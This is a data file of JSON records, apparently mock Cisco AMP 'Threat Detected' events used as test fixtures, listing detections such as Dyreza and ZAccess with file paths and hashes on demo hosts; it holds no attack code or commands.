+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255953394991000,"timestamp":1610705129,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:05:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255953394991134","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364428879725000,"timestamp":1610705124,"timestamp_nanoseconds":271000000,"date":"2021-01-15T10:05:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364394519986204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":3924,"disposition":"Clean","file_name":"InstallFlashPlayer.exe","identity":{"sha256":"672ec8dceafd429c1a09cfafbc4951968953e2081e0d97243040db16edb24429","sha1":"5c921b125bac24670d2bf27659e100cdf24e7e7f","md5":"2ff9b590342c62748885d459d082295f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":628000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252765","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":612000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176255919035252764","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255919035253000,"timestamp":1610705121,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:05:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255919035252763","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":846000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215109","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":839000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215107","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":790000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215108","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11938f43-647341ab-temp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\3\\11938f43-647341ab-temp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364411699855000,"timestamp":1610705120,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:05:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364364455215105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jar_cache4855455380559478946.tmp","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\jar_cache4855455380559478946.tmp","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"process_id":3428,"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9","sha1":"69434b7adf90c7f2f53612816366885fcd8e27b3","md5":"4d3663c67b30eedf4a6c8a711e7fe6f9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255906150351000,"timestamp":1610705118,"timestamp_nanoseconds":24000000,"date":"2021-01-15T10:05:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255906150350874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":715000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084315","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084314","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364381635084000,"timestamp":1610705113,"timestamp_nanoseconds":677000000,"date":"2021-01-15T10:05:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364381635084313","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":501000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Kazy:Troj_Generic-tpd","detection_id":"5832364373045149720","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"n","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1089625888-3054005746-3039903294-1000\\$ff20833dbb78e410a1126d2ca0eecb73\\n","identity":{"sha256":"c9dbfc24f40bc1aa49bd8eac43eb08c26d4587b926f7bacb94cb44a87cdc5600","sha1":"9f9cc367265c8e04747004f4bb122d6084c9bd79","md5":"69bc8b1dcfde7443d80d4b34b45bd193"},"parent":{"process_id":4016,"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":441000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149719","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":149000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182417","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149717","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364373045150000,"timestamp":1610705111,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:05:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364373045149716","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat 